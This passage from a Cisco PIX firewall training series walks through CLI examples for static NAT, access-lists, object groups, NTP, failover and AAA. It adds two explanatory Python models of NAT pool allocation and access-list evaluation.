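As an added example (not NetworkSims or Cisco code), the following Python models how a PIX pairs a nat entry with a global pool purely by nat_id on the exit interface, and how, once a range pool is used up, later hosts share the single PAT address as the help global text describes. The hosts in 143.163.128.0/18 and the PAT address 137.68.10.30 are constructed; note that as typed above the nat entry uses id 1 while the global pool uses id 3, so the two would not pair and no dynamic translation would be built.

```python
"""Model of PIX 6.x nat/global pairing and pool-then-PAT allocation (added example)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class NatRule:
    if_name: str
    nat_id: int
    local: ipaddress.IPv4Network


@dataclass
class GlobalPool:
    if_name: str
    nat_id: int
    addrs: list                            # one-to-one pool addresses (a range); empty for PAT-only
    pat: Optional[ipaddress.IPv4Address]   # single address used for PAT, if any


NAT_RE = re.compile(r"^nat \((\w+)\) (\d+) (\S+) (\S+)$")
GLOBAL_RE = re.compile(r"^global \((\w+)\) (\d+) (\S+)(?: netmask (\S+))?$")


def parse_nat(line: str) -> NatRule:
    """Parse 'nat (inside) 1 143.163.128.0 255.255.192.0'."""
    m = NAT_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a nat command: {line!r}")
    net = ipaddress.IPv4Network(f"{m.group(3)}/{m.group(4)}", strict=False)
    return NatRule(m.group(1), int(m.group(2)), net)


def parse_global(line: str) -> GlobalPool:
    """Parse a global line: a range becomes a one-to-one pool, a single address is the PAT address."""
    m = GLOBAL_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a global command: {line!r}")
    spec = m.group(3)
    if "-" in spec:
        lo, hi = (int(ipaddress.IPv4Address(a)) for a in spec.split("-", 1))
        addrs = [ipaddress.IPv4Address(i) for i in range(lo, hi + 1)]
        return GlobalPool(m.group(1), int(m.group(2)), addrs, None)
    return GlobalPool(m.group(1), int(m.group(2)), [], ipaddress.IPv4Address(spec))


class Xlate:
    """Allocates mapped addresses the way a PIX builds its xlate table."""

    def __init__(self, nats, pools):
        self.nats = nats
        self.pools = pools
        self.free = {i: list(p.addrs) for i, p in enumerate(pools)}
        self.table = {}          # real address -> (mapped address, PAT port or None)
        self.next_port = 1024    # constructed starting PAT port for this model

    def translate(self, real_ip: str, out_if: str = "outside"):
        real = ipaddress.IPv4Address(real_ip)
        if real in self.table:
            return self.table[real]          # existing xlate is reused
        # The most specific nat entry wins; a '0' entry (if present) is the least specific.
        rules = [r for r in self.nats if real in r.local]
        if not rules:
            return None                      # no nat entry: no xlate is built
        rule = max(rules, key=lambda r: r.local.prefixlen)
        if rule.nat_id == 0:
            return (real, None)              # identity translation
        # The global pool is chosen only by matching nat_id on the exit interface.
        pools = [(i, p) for i, p in enumerate(self.pools)
                 if p.nat_id == rule.nat_id and p.if_name == out_if]
        for i, p in pools:
            if self.free[i]:
                mapped = (self.free[i].pop(0), None)
                self.table[real] = mapped
                return mapped
        for _, p in pools:                   # range exhausted: share the PAT address
            if p.pat is not None:
                mapped = (p.pat, self.next_port)
                self.next_port += 1
                self.table[real] = mapped
                return mapped
        return None                          # ids do not match, or pool full with no PAT


# Constructed configurations. CHALLENGE uses the ids exactly as typed above (1 and 3).
CHALLENGE = Xlate([parse_nat("nat (inside) 1 143.163.128.0 255.255.192.0")],
                  [parse_global("global (outside) 3 137.68.10.3-137.68.10.23 netmask 255.255.255.0")])
PAIRED = Xlate([parse_nat("nat (inside) 1 143.163.128.0 255.255.192.0")],
               [parse_global("global (outside) 1 137.68.10.3-137.68.10.5 netmask 255.255.255.0"),
                parse_global("global (outside) 1 137.68.10.30")])

if __name__ == "__main__":
    print("mismatched ids:", CHALLENGE.translate("143.163.130.1"))   # None
    for h in range(1, 5):                                              # three pool hits, then PAT
        print(PAIRED.translate(f"143.163.130.{h}"))
```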

Cisco PIX Challenge 14

Outline
This challenge involves the configuration of a static route.
Objectives
The objectives of this challenge are to:

Define the IP address and subnet mask of the interfaces.
Define a static mapping.

Example (Ver 6.x)
myPIX (config)# ip address outside 84.120.11.5 255.128.0.0
myPIX (config)# ip address inside 10.10.0.1 255.128.0.0
myPIX (config)# ip address inf 172.16.0.1 255.128.0.0
myPIX (config)# show ip address
myPIX (config)# static (inside, outside) 84.120.11.15 211.204.152.13
myPIX (config)# show static

Example (Ver 7.x)
myPIX (config)# int e0
myPIX (config-if)# ip address 84.120.11.5 255.128.0.0
myPIX (config-if)# nameif outside
myPIX (config-if)# int e1
myPIX (config-if)# ip address 10.10.0.1 255.128.0.0
myPIX (config-if)# nameif inside
myPIX (config-if)# int e2
myPIX (config-if)# ip address 172.16.0.1 255.128.0.0
myPIX (config-if)# nameif inf2
myPIX (config-if)# exit
myPIX (config)# show ip address

myPIX (config)# help static
USAGE:
[no] static [(real_ifc, mapped_ifc)]
{<mapped_ip>|interface}
{<real_ip> [netmask <mask>]} | {access-list <acl_name>}
[dns]
[[tcp] <max_conns> [<emb_lim> [<norandomseq> [nailed]]]]
[udp <max_conns>]
[no] static [(real_ifc, mapped_ifc)] {tcp|udp}
{<mapped_ip>|interface} <mapped_port>
{<real_ip> <real_port> [netmask <mask>]} |
{access-list <acl_name>}
[dns]
[[tcp] <max_conns> [<emb_lim> [<norandomseq> [nailed]]]]
[udp <max_conns>]
DESCRIPTION:
static        Configure one-to-one address translation rule
SYNTAX:
<real_ifc>    Name of the network interface, as specified by 'nameif',
              where the hosts or networks designated by <real_ip> or
              sources in access-list are accessed.
<mapped_ifc>  Name of the network interface, as specified by 'nameif',
              where the <real_ip> or by the source in access-list are
              translated into <mapped_ip>.
tcp           TCP static PAT.
udp           UDP static PAT.
<real_ip>     Address as configured at the actual host.
<real_port>   Port as viewed from the actual host.
<mapped_ip>   Masquerade address of the <real_ip> or of the source
              address in access-list.
<mask>        The IP netmask to apply to <real_ip>.
<mapped_port> Masquerade port of the <real_port> or of the source
              port in access-list.
interface     Address taken from <mapped_ifc>.
<acl_name>    The access-list name with the source fields defining
              the real address and real port, if applicable,
              before translation.
dns           Rewrite DNS address record.
norandomseq   Disable TCP sequence number randomization.
nailed        Allow TCP sessions for asymmetrically routed traffic
<max_conn>    The maximum number of simultaneous TCP connections that
              each <real_ip> hosts will each be allowed to use. Idle
              connections are closed after the time specified by the
              timeout conn command.
<emb_limit>   Maximum number of embryonic connections per host. An
              embryonic connection is a connection request that has not
              completed TCP 3-way handshake between source and
              destination.
see also:     nat, global
myPIX (config)# static ?
configure mode commands/options:
( Open parenthesis for (<internal_if_name>,<external_if_name>) pair
where <internal_if_name> is the Internal or prenat interface and
<external_if_name> is the External or postnat interface
myPIX (config)# static (inside, outside) 84.120.11.15 211.204.152.13
myPIX (config)# show running static

Cisco PIX Challenge 15

Outline
This challenge involves the configuration of the activation key.
Objectives
The objectives of this challenge are to:

Configure the activation key.
Show the activation key.

Example
myPIX # help activation-key
USAGE:
activation-key <activation-key-four-or-five-tuple>
show activation-key
DESCRIPTION:
activation-key

Modify activation-key.

SYNTAX:
<activation-key-four-or-five-tuple>
a four or five element hexadecimal string.
myPIX (config)# activation-key 1aa3aaab abfbcef1 133445ee ee56f6b0
myPIX (config)# show activation-key

Cisco PIX Challenge 16

Outline
This challenge involves the configuration of an access-list.
Objectives
The objectives of this challenge are to:

Define a named access-list.
Apply the access-list onto an interface.

Example
myPIX (config)# help access-l
USAGE:
Extended access list:
Use this to configure policy for IP traffic through the firewall
[no] access-list <id> [line <line_num>] [extended] {deny | permit}
{<protocol> | object-group <protocol_obj_grp_id>}
{host <sip> | <sip> <smask> |
object-group <network_obj_grp_id>}
[<operator> <port> [<port>] |
object-group <service_obj_grp_id>]
{<dip> <dmask> | object-group <network_obj_grp_id>}
[<operator> <port> [<port>] |
object-group <service_obj_grp_id>]
[log [disable] | [<level>] | [default] [interval <secs>]]
[no] access-list <id> [line <line_num>] {deny | permit} icmp
{host <sip> | <sip> <smask> |
object-group <network_obj_grp_id>}
{<dip> <dmask> | object-group <network_obj_grp_id>}
[<icmp_type> | object-group <icmp_type_obj_grp_id>]
[log [disable] | [<level>] | [default] [interval <secs>]]
[no] access-list <id> webtype {deny|permit}
url {<url-string>|any} [log {disable | default | level}
[interval <seconds>]] [time-range <name>] [inactive]
[no] access-list <id> webtype {deny | permit>
tcp {host <host-addr> | <dest-addr> <dest-mask> | any}
[{{EQ | NEQ | LT | GT} <port> | RANGE <port> <port>}]
[log {disable | default | <level>} [interval <seconds>]]
[time-range <name> ] [ inactive ]
[no] access-list <id> [line <line_num>] remark <text>
access-list deny-flow-max <n>
access-list alert-interval <secs>
Standard access list:
Use this to configure policy having destination host or network only
[no] access-list <id> standard {deny|permit} {any | <ip> <mask> | host <ip>}
[no] access-list <id> remark <text>
Generic Commands:
show access-list [<id>]
show running-config access-list
[alert-interval | deny-flow-max | <id>]
clear configure access-list [<id>]
clear access-list [<id> [counters]]
DESCRIPTION:
access-list   Add an access list
SYNTAX:
<id>          Access list number
<line_num>    Specify line number at which ACE should be entered
<webtype>     Use this to configure Web related policy
deny          Denies access if the conditions are matched.
permit        Permits access if the conditions are matched.
object-group  Keyword for specifying an object group.
obj_grp_id    Identifier of an existing object group.
remark        Specify a comment (remark)
<protocol>    The IP protocol name or number that will be open
              udp is 17, tcp is 6, egp is 47, etc.
<sip>         Source IP address
<smask>       Mask to be applied to <sip>
<dip>         Destination IP address
<dmask>       Mask to be applied to <dip>
<operator>    Compares <sip> or <dip> ports. Possible operands
              include lt (less than), gt (greater than), eq (equal), neq
              (not equal), and range (inclusive range).
<port>        The decimal number or name of a TCP or UDP port
<text>        comment (remark)
log           Keyword for enabling log option on this ACL element.
disable       Keyword for disabling log option on this ACL element.
default       Keyword for set log option on this ACL element to
              default values.
<level>       Optional syslog level (0-7); default level is 6.
interval      Keyword for specifying log interval.
<secs>        Optional log interval value (1-600); default is 300.
<icmp_type>   0 echo-reply,
              3 unreachable,
              4 source-quench,
              5 redirect,
              6 alternate-address,
              8 echo,
              9 router-advertisement,
              10 router-solicitation,
              11 time-exceeded,
              12 parameter-problem,
              13 timestamp-request,
              14 timestamp-reply,
              15 information-request,
              16 information-reply,
              17 address-mask-request,
              18 address-mask-reply,
              31 conversion-error or
              32 mobile-redirect
see also:     access-group, object-group
myPIX (config)# access-list uranus permit ip host 26.32.188.8 host 129.67.195.1
myPIX (config)# access-list uranus deny ip host 201.122.28.7 host 209.215.90.6
myPIX (config)# help access-g
USAGE:
[no] access-group <access-list> <in|out> interface <if_name> [per-user-override]
DESCRIPTION:
access-group      Bind an extended access-list to an interface to filter inbound
                  traffic
SYNTAX:
<access-list>     Extended access list number
<in|out>          Inbound or Outbound access list
<if_name>         Name of the interface
per-user-override Allow AAA downloaded per-user ACL to override
see also:         access-list, object-group
myPIX (config)# access-group uranus in interface outside
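As an added example (not NetworkSims or Cisco code), the following Python parses the two access-list entries and the access-group binding from this challenge and evaluates packets against them in order, ending with the implicit deny that closes every PIX access-list. It covers the ACE forms used above (permit/deny, protocol ip/tcp/udp/icmp, host or network-plus-mask or any, an optional destination port operator) and adds one constructed port-specific entry; log keywords and object-groups are not modelled.

```python
"""First-match evaluation of PIX extended access-lists with implicit deny (added example)."""
import ipaddress
from dataclasses import dataclass
from typing import Optional, Tuple

PORT_OPS = ("eq", "neq", "lt", "gt", "range")


@dataclass
class Ace:
    action: str                      # "permit" or "deny"
    proto: str                       # "ip" matches any protocol
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    op: Optional[str] = None         # destination port operator, if any
    ports: Tuple[int, ...] = ()


def _take_addr(tokens, i):
    """Consume 'host A', 'any' or 'A MASK' at tokens[i]; return (network, next index)."""
    if tokens[i] == "host":
        return ipaddress.IPv4Network(tokens[i + 1] + "/32"), i + 2
    if tokens[i] == "any":
        return ipaddress.IPv4Network("0.0.0.0/0"), i + 1
    return ipaddress.IPv4Network(f"{tokens[i]}/{tokens[i + 1]}", strict=False), i + 2


def parse_ace(line):
    """Parse 'access-list <id> [extended] permit|deny <proto> <src> <dst> [<op> <port> [<port>]]'."""
    t = line.split()
    if t[0] != "access-list":
        raise ValueError(f"not an access-list line: {line!r}")
    acl_id, i = t[1], 2
    if t[i] == "extended":
        i += 1
    action, proto, i = t[i], t[i + 1], i + 2
    src, i = _take_addr(t, i)
    dst, i = _take_addr(t, i)
    op, ports = None, ()
    if i < len(t) and t[i] in PORT_OPS:
        op = t[i]
        count = 2 if op == "range" else 1
        ports = tuple(int(p) for p in t[i + 1:i + 1 + count])
    return acl_id, Ace(action, proto, src, dst, op, ports)


def parse_access_group(line):
    """Parse 'access-group <id> in|out interface <if_name>' into ((if_name, direction), id)."""
    t = line.split()
    return (t[4], t[2]), t[1]


def _port_ok(ace, dport):
    if ace.op is None:
        return True
    if dport is None:
        return False
    lo = ace.ports[0]
    return {"eq": dport == lo, "neq": dport != lo, "lt": dport < lo,
            "gt": dport > lo, "range": lo <= dport <= ace.ports[-1]}[ace.op]


def evaluate(acl, proto, src, dst, dport=None):
    """Return (action, index of the matching ACE), or ('deny', None) for the implicit deny."""
    s, d = ipaddress.IPv4Address(src), ipaddress.IPv4Address(dst)
    for n, ace in enumerate(acl):
        if ace.proto != "ip" and ace.proto != proto:
            continue
        if s not in ace.src or d not in ace.dst or not _port_ok(ace, dport):
            continue
        return ace.action, n
    return "deny", None


def filter_packet(bindings, acls, if_name, direction, proto, src, dst, dport=None):
    """Apply the access-group bound to (if_name, direction); None means no ACL is bound there
    and the interface security-level policy (not modelled here) decides instead."""
    acl_id = bindings.get((if_name, direction))
    if acl_id is None:
        return None
    return evaluate(acls[acl_id], proto, src, dst, dport)


# The challenge's own two entries plus one constructed port-specific entry. The explicit
# deny ahead of the implicit deny changes nothing about the verdict; it gives that flow
# its own hit counter and log entries.
CONFIG = [
    "access-list uranus permit ip host 26.32.188.8 host 129.67.195.1",
    "access-list uranus deny ip host 201.122.28.7 host 209.215.90.6",
    "access-list uranus permit tcp any host 129.67.195.1 eq 443",   # constructed
]
ACLS = {}
for _line in CONFIG:
    _id, _ace = parse_ace(_line)
    ACLS.setdefault(_id, []).append(_ace)
BINDINGS = dict([parse_access_group("access-group uranus in interface outside")])

if __name__ == "__main__":
    print(filter_packet(BINDINGS, ACLS, "outside", "in", "tcp", "26.32.188.8", "129.67.195.1", 80))
    print(filter_packet(BINDINGS, ACLS, "outside", "in", "tcp", "203.0.113.5", "129.67.195.1", 80))
```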

Cisco PIX Challenge 17

Outline
This challenge involves the configuration of object groups.
Objectives
The objectives of this challenge are to:

Define a network object-group.
Define a protocol object-group.
Define an ICMP object-group.

Example
myPIX (config)# help object-group
USAGE:
[no] object-group protocol | network | icmp-type <obj_grp_id>
[no] object-group service <obj_grp_id> tcp|udp|tcp-udp
show running-config [all] object-group
[protocol | service | icmp-type | network]
show running-config [all] object-group id <obj_grp_id>
clear configure object-group [protocol | service | icmp-type | network]
DESCRIPTION:
object-group     Create an object group for use in 'access-list'
SYNTAX:
protocol         Specifies a group of protocols, such as TCP, etc
network          Specifies a group of host or subnet IP addresses
service          Specifies a group of TCP/UDP ports/services
icmp-type        Specifies a group of ICMP types, such as echo
<obj_grp_id>     The identifier for the object group:
                 Must be 1 - 64 characters long, consisting of
                 letters, digits, '-', '_', or '.'.
tcp|udp|tcp-udp  Specifies the protocol type for a service group;
                 tcp - services provided via TCP only, such as ftp
                 udp - services provided via UDP only, such as snmp
                 tcp-udp - services provided via both TCP and UDP
show             Show object group(s) running config
clear            Remove existing object group(s) config
see also:        protocol-object, network-object,
                 port-object, icmp-object, group-object
myPIX (config)# object-group network montana
myPIX(config-network)# exit
myPIX (config)# object-group protocol newyork
myPIX(config-protocol)# exit
myPIX (config)# object-group icmp-type birmingham
myPIX(config-icmp-type)# exit

Cisco PIX Challenge 18

Outline
This challenge involves the configuration of NTP.
Objectives
The objectives of this challenge are to:

Define the names of the interfaces.
Define the details of the NTP servers.

Example (Ver 6.x)
> enable
myPIX # config t
myPIX (config)# nameif e0 columbia security0
myPIX (config)# nameif e1 orkney security100
myPIX (config)# nameif e2 florida security50
myPIX (config)# ntp server 73.35.212.5 source columbia
myPIX (config)# ntp server 70.51.127.73 source orkney
myPIX (config)# ntp server 69.49.18.8 source florida
myPIX (config)# show ntp

Example (Ver 7.x)
> enable
myPIX # config t
myPIX (config)# int e0
myPIX (config-if)# nameif columbia
myPIX (config-if)# security-level 0
myPIX (config-if)# exit
myPIX (config)# int e1
myPIX (config-if)# nameif orkney
myPIX (config-if)# speed 100
myPIX (config-if)# exit
myPIX (config)# int e2
myPIX (config-if)# nameif florida
myPIX (config-if)# security-level 50
myPIX (config-if)# exit
myPIX (config)# help ntp
USAGE:
ntp authenticate
no ntp authenticate
ntp authentication-key <number> md5 <value>
no ntp authentication-key <number> [md5 <value>]
ntp server <ip_address> [key <number>] [source <if_name>] [prefer]
no ntp server <ip_address> [key <number>] [source <if_name>] [prefer]
ntp trusted-key <number>
no ntp trusted-key <number>
show ntp [associations [detail] | status]
DESCRIPTION:
ntp           Configure Network Time Protocol
SYNTAX:
<if_name>     The interface name of the time server.
<ip_address>  The ip address of the time server.
<number>      The key number, range <1-4294967295>.
<value>       The key value. Key length range is <1-32>.
see also:     clock
myPIX (config)# ntp server ?
configure mode commands/options:
Hostname or A.B.C.D IP address of peer
myPIX (config)# ntp server 73.35.212.5 ?
configure mode commands/options:
key     Configure peer authentication key
prefer  Prefer this peer when possible
source  Interface for source address
<cr>
pixfirewall(config)# ntp server 73.35.212.5 source ?
configure mode commands/options:
Current available interface(s):
florida    Name of interface Ethernet2
orkney     Name of interface Ethernet1
columbia   Name of interface Ethernet0
myPIX (config)# ntp server 73.35.212.5 source columbia
myPIX (config)# ntp server 70.51.127.73 source orkney
myPIX (config)# ntp server 69.49.18.8 source florida
myPIX (config)# exit
myPIX # show ntp status

Cisco PIX Challenge 19

Outline
This challenge involves the configuration of cable-based failover.
Objectives
The objectives of this challenge are to:

Enable failover.
Define failover addresses.
Define failover poll time.

Example (V6.x)
myPIX (config)# help fail
USAGE:
[no] failover
[no] failover polltime [unit] [msec] <time> [holdtime <seconds>]
[no] failover polltime interface <seconds>
[no] failover replication http
[no] failover lan unit primary|secondary
[no] failover interface ip <ifc_name> <ip_address> <mask> standby <ip_address>
[no] failover interface-policy <n>[%]
[no] failover key <shared_key>
[no] failover lan interface <ifc_name> <phyifc>[.<subifc_id>]
[no] failover link <ifc_name> [<phyifc>[.<subifc_id>]]
[no] failover mac address <phyifc> <act_mac> <stn_mac>
[no] failover timeout <hh:mm:ss>
[no] failover lan enable
[no] failover active
failover reset
failover reload-standby
show failover [history|interface|state|statistics]
DESCRIPTION:
failover

Configure failover feature

SYNTAX:
active
Make this the active unit of a failover pair
reset
Force both units back to an unfailed state
<ifc_name>
Interface name
<ip_address>
IP Address
<mask>
IP Netmask
<n>[%]
Number/percent of monitored interfaces causing failover
[unit] [msec] <time>
Unit poll interval (500msec-999msec, 1-15 seconds)
holdtime <seconds>
Unit holdtime (3-45 seconds)
polltime interface <seconds>
Interface poll interval (3-15 seconds)
replication http
Enable HTTP (port 80) connection replication
lan unit {primary|secondary}
Specify the unit as primary or secondary
lan interface
Specify the failover interface parameters
link
Specify the stateful interface parameters
interface ip
Specify IP and mask for failover/stateful interface
interface-policy
Specify interface monitoring failure policy
key <shared_key>
Specify failover encryption shared key
show failover
Display failover runtime info
mac address
Specify virtual mac address for a physical interface
<phyifc>
Physical interface name
<subifc_id>
Sub-interface id
<act_mac> <stn_mac>
Active and standby mac address
timeout
Specify failover reconnect timeout value for ASR sessions
lan enable
Enable LAN-Based failover on PIX platform
myPIX (config)# failover active
myPIX (config)# failover ip address outside 157.202.212.2
myPIX (config)# failover ip address inside 73.105.56.11
myPIX (config)# failover ip address inf2 166.209.230.11
myPIX (config)# failover poll 2
myPIX (config)# show failover

Example (V7.x)
myPIX (config)# help fail
USAGE:
[no] failover
[no] failover polltime [unit] [msec] <time> [holdtime <seconds>]
[no] failover polltime interface <seconds>
[no] failover replication http
[no] failover lan unit primary|secondary
[no] failover interface ip <ifc_name> <ip_address> <mask> standby <ip_address>
[no] failover interface-policy <n>[%]
[no] failover key <shared_key>
[no] failover lan interface <ifc_name> <phyifc>[.<subifc_id>]
[no] failover link <ifc_name> [<phyifc>[.<subifc_id>]]
[no] failover mac address <phyifc> <act_mac> <stn_mac>
[no] failover timeout <hh:mm:ss>
[no] failover lan enable
[no] failover active
failover reset
failover reload-standby
show failover [history|interface|state|statistics]
DESCRIPTION:
failover

Configure failover feature

SYNTAX:
active
Make this the active unit of a failover pair
reset
Force both units back to an unfailed state
<ifc_name>
Interface name
<ip_address>
IP Address
<mask>
IP Netmask
<n>[%]
Number/percent of monitored interfaces causing failover
[unit] [msec] <time>
Unit poll interval (500msec-999msec, 1-15 seconds)
holdtime <seconds>
Unit holdtime (3-45 seconds)
polltime interface <seconds>
Interface poll interval (3-15 seconds)
replication http
Enable HTTP (port 80) connection replication
lan unit {primary|secondary}
Specify the unit as primary or secondary
lan interface
Specify the failover interface parameters
link
Specify the stateful interface parameters
interface ip
Specify IP and mask for failover/stateful interface
interface-policy
Specify interface monitoring failure policy
key <shared_key>
Specify failover encryption shared key
show failover
Display failover runtime info
mac address
Specify virtual mac address for a physical interface
<phyifc>
Physical interface name
<subifc_id>
Sub-interface id
<act_mac> <stn_mac>
Active and standby mac address
timeout
Specify failover reconnect timeout value for ASR sessions
lan enable
Enable LAN-Based failover on PIX platform
myPIX (config)# failover active
myPIX (config)# failover int ?
configure mode commands/options:
ip Configure the IP address and mask after this keyword
myPIX (config)# fai int ip ?
configure mode commands/options:
WORD Interface name
myPIX (config)# fai int ip ANY ?
configure mode commands/options:
Hostname or A.B.C.D Specify the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 ?
configure mode commands/options:
A.B.C.D Specify the mask for the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 ?
configure mode commands/options:
standby Configure the standby IP address after this keyword
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan ?
configure mode commands/options:
Hostname or A.B.C.D Specify the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan 157.202.212.3 ?
configure mode commands/options:
<cr>
myPIX (config)# failover interface ip address outside 157.202.212.2
myPIX (config)# failover interface ip address inside 73.105.56.11
myPIX (config)# failover interface ip address inf2 166.209.230.11
myPIX (config)# failover poll 2
myPIX (config)# show running failover

Cisco PIX Challenge 20

Outline
This challenge involves the configuration of failover for a primary device over a LAN.
Objectives
The objectives of this challenge are to:

Enable failover.
Define failover addresses.
Define failover parameters.

Example (V6.x)
myPIX (config)# failover active
myPIX (config)# failover ip address outside 157.202.212.2
myPIX (config)# failover ip address inside 73.105.56.11
myPIX (config)# failover ip address inf2 166.209.230.11
myPIX (config)# failover poll 2
myPIX (config)# failover lan key mypix
myPIX (config)# failover lan unit primary
myPIX (config)# failover lan interface inf2
myPIX (config)# show failover

Example (V7.x)
myPIX (config)# failover ?
configure mode commands/options:
interface        Configure the IP address and mask to be used for failover
                 and/or stateful update information
interface-policy Set the policy for failover due to interface failures
key              Configure the failover shared secret
lan              Specify the unit as primary or secondary or configure the
                 interface and vlan to be used for failover communication
link             Configure the interface and vlan to be used as a link for
                 stateful update information
mac              Specify the virtual mac address for a physical interface
polltime         Configure failover poll interval
replication      Enable HTTP (port 80) connection replication
timeout          Specify the failover reconnect timeout value for
                 asymmetrically routed sessions
<cr>
exec mode commands/options:
active           Make this system to be the active unit of the failover pair
reload-standby   Force standby unit to reboot
reset            Force an unit or failover group to an unfailed state
myPIX (config)# failover active
myPIX (config)# failover int ?
configure mode commands/options:
ip Configure the IP address and mask after this keyword
myPIX (config)# fai int ip ?
configure mode commands/options:
WORD Interface name
myPIX (config)# fai int ip ANY ?
configure mode commands/options:
Hostname or A.B.C.D Specify the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 ?
configure mode commands/options:
A.B.C.D Specify the mask for the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 ?
configure mode commands/options:
standby Configure the standby IP address after this keyword
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan ?
configure mode commands/options:
Hostname or A.B.C.D Specify the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan 157.202.212.3 ?
configure mode commands/options:
<cr>
myPIX (config)# failover interface ip address outside 157.202.212.2
myPIX (config)# failover interface ip address inside 73.105.56.11
myPIX (config)# failover interface ip address inf2 166.209.230.11
myPIX (config)# failover poll 2
myPIX (config)# failover lan ?
configure mode commands/options:
enable     Enable LAN-Based failover
interface  Configure the interface and vlan to be used for failover
           communication
unit       Configure the unit as primary or secondary
myPIX (config)# failover lan key mypix
myPIX (config)# failover lan unit primary
myPIX (config)# failover lan interface inf2
myPIX (config)# show running failover

Cisco PIX Challenge 21

Outline
This challenge involves the configuration of failover for a secondary device over a LAN.
Objectives
The objectives of this challenge are to:

Enable failover.
Define failover addresses.
Define failover parameters.

Example (V6.x)
myPIX (config)# failover active
myPIX (config)# failover ip address outside 157.202.212.2
myPIX (config)# failover ip address inside 73.105.56.11
myPIX (config)# failover ip address inf2 166.209.230.11
myPIX (config)# failover poll 2
myPIX (config)# failover lan key mypix
myPIX (config)# failover lan unit secondary
myPIX (config)# failover lan interface inf2
myPIX (config)# show failover

Example (V7.x)
myPIX (config)# failover active
myPIX (config)# failover interface ip outside 157.202.212.2 standby 157.202.212.3
myPIX (config)# failover interface ip inside 73.105.56.11 standby 73.105.56.12
myPIX (config)# failover interface ip inf2 166.209.230.11 standby 166.209.230.12
myPIX (config)# failover poll 2
myPIX (config)# failover lan key mypix
myPIX (config)# failover lan unit secondary
myPIX (config)# failover lan interface inf2
myPIX (config)# show failover

Cisco PIX Challenge 26

Outline
This challenge involves the configuration of local AAA.
Objectives
The objectives of this challenge are to:

Define local AAA.
Define authentication.

Example
myPIX (config)# help aaa-server
USAGE:
[no] aaa-server <tag> <(if_name)> host <ip_address>
[no] aaa-server <tag> protocol <protocol>
clear configure aaa-server [<tag>]
show running-config [all] aaa-server [<tag> [<(if_name)>
host <ip_address>]]
show aaa-server [<tag> [host <hostname>]]
show aaa-server protocol <protocol>
clear aaa-server statistics [<tag> [host <hostname>]]
clear aaa-server statistics protocol <protocol>
test aaa-server authentication <group tag> [host <ip_address>]
[username <user>] [password <password>]
test aaa-server authorization <group tag> [host <ip_address>]
[username <user>]
DESCRIPTION:
aaa-server          Define AAA Server group
SYNTAX:
<tag>               Symbolic name of the server group.
<if_name>           The network interface where the authentication server
                    resides.
<local_ip>          The IP address of the AAA server.
<protocol>          The AAA protocol supported by servers in the group.
                    Supported protocol types are radius, tacacs+, sdi,
                    nt, kerberos and ldap
<acct mode>         Specify either 'simultaneous' or 'single' mode
                    accounting
<reactivation mode> Specify the method by which failed servers are
                    reactivated. Either timed or depletion.
see also:           aaa,nameif
myPIX (config)# aaa-server orange protocol local
myPIX (config)# username fred password bert
pixfirewall(config)# help aaa
USAGE:
[no] aaa mac-exempt match <mac-list-id>
[no] aaa authentication secure-http-client
[no] aaa authentication|authorization|accounting include|exclude <svc>
<if_name> <l_ip> <l_mask> [<f_ip> <f_mask>] <server_tag>
[no] aaa authentication serial|telnet|ssh|http|enable console
<server_tag> [LOCAL]
[no] aaa accounting telnet|ssh|http|serial|enable console <server_tag>
[no] aaa authentication|authorization|accounting match
<access_list_name> <if_name> <server_tag>
[no] aaa authorization command {LOCAL | <tacacs_server_tag> [LOCAL]}
[no] aaa accounting command {privilege <level>} <tacacs_server_tag>
[no] aaa proxy-limit <proxy limit> | disable
[no] aaa local authentication attempts max-fail <fail-attempts>
clear configure aaa
clear aaa local user {fail-attempts|lockout} {all | username <uname>}}
show running-config [all] aaa [authentication|authorization|accounting
|max-exempt|proxy-limit]
show aaa local user [lockout]
DESCRIPTION:
aaa               Enable, disable, or view TACACS+, RADIUS or LOCAL
                  user authentication, authorization and accounting
SYNTAX:
secure-http-client
                  HTTP client authentication is secured (over SSL)
include|exclude   Include or exclude the service, local and foreign network which
                  needs to be authenticated, authorized, and accounted
<svc>             For Authentication, use the following values:
                  telnet, ftp, http, https, tcp/<port> and tcp/0.
                  For Authorization, use the following values:
                  telnet, ftp, http, https, tcp/0, tcp/<port>, udp/<port>,
                  icmp/<port> or <protocol>[</port>]
                  For Accounting, use the following values:
                  telnet, ftp, http, https, tcp/0, tcp/<port>, udp/<port>,
                  icmp/<port> or <protocol>[</port>]
                  For authentication of console access, telnet access, SSH access
                  and enable mode access, specify telnet|ssh|enable respectively.
<if_name>         Authenticate, authorize or account connections
                  originated at an interface.
<l_ip>            The address of the local/internal host which is source or
                  destination for connections requiring authentication
<l_mask>          Network mask to apply to <l_ip>
<f_ip>            The address of the foreign host which is either source or
                  destination for connections requiring authentication
<f_mask>          Network mask to apply to <f_ip>
<server_tag>      For Authentication and Accounting, use values defined
                  by aaa-server command.
                  For cut-through and 'to the box' Authentication and Command
                  Authorization, the server tag LOCAL, can also be used.
                  Only tacacs+ is supported for 'through the box' Authorization.
LOCAL             Predefined server tag for aaa protocol 'local'
                  The server tag LOCAL can also be used as a fallback method in
                  case of the AAA server tag being unreachable. The AAA Fallback
                  is available only for 'to the box' authentication and command
                  authorization. The fallback method can only be LOCAL and it can
                  be used only if a AAA server is specified for the server_tag
<proxy limit>     Number of concurrent proxy connections allowed per user.
<fail-attempts>   Number of failed authentication attempts after which user is locked
                  out
<uname>           Locally configured username
see also:         aaa-server, username
myPIX (config)# aaa authentication http console orange
myPIX (config)# aaa authentication serial console orange
myPIX (config)# aaa authentication telnet console orange

Cisco PIX Challenge 27


Outline
This challenge involves the configuration of remote AAA.
Objectives
The objectives of this challenge are to:

Enable AAA.
Define authentication.

Example
myPIX (config)# aaa-server orange protocol radius
myPIX (config)# aaa-server orange (inside) host 155.109.40.4 beetroot
